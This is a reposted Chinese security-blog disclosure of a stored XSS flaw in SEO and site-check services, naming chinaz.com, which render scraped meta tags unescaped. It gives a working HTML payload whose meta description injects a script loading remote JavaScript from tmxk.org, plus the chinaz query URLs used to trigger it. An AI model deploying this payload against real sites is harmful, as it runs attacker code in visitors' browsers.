• 选择风格
  • 加入收藏
  • 繁體中文
  • 网站地图
    • 当前位置:首页 >> 网络通讯 >> 网络安全 >> 内容

    站长之家存储型xss(一种新思路)

    时间:2013/4/19 12:10:00 作者:平凡之路 来源:xuhantao.com 浏览:

    这是一类网站。

    详细说明:现在有很多网站信息查询,seo优化,网站安全检测之类的网站,这些网站通常会抓取网页的meta信息。这样如果用户的meta是恶意代码,就会出现问题。涛涛电脑知识

    站长之家等网站就有这样的问题。

    测试代码,写一个简单的页面:

     

    <html>

    <head><meta name="keywords" content='tmxk.org' />

    <meta name="description" content="<script src=http://tmxk.org/x.js style=''" /></head><body></body></html>

     

    然后到站长之家去检测,

    seo.chinaz.com/?host=unbet8.com%2f%

    截图:

     


     

     

     

     

     

    其它举例:

     

    #url=unbet8.com/0.htm

    ?url=unbet8.com%2F%

     

  • 上一篇:Spring MVC防御CSRF和XSS
  • 下一篇:Metinfo 代码审计
    • 相关文章
    • 没有相关文章
  • 徐汉涛(www.xuhantao.com) © 2024 版权所有 All Rights Reserved.
  • 部分内容来自网络,如有侵权请联系站长尽快处理 站长QQ:965898558(广告及站内业务受理) 网站备案号:蒙ICP备15000590号-1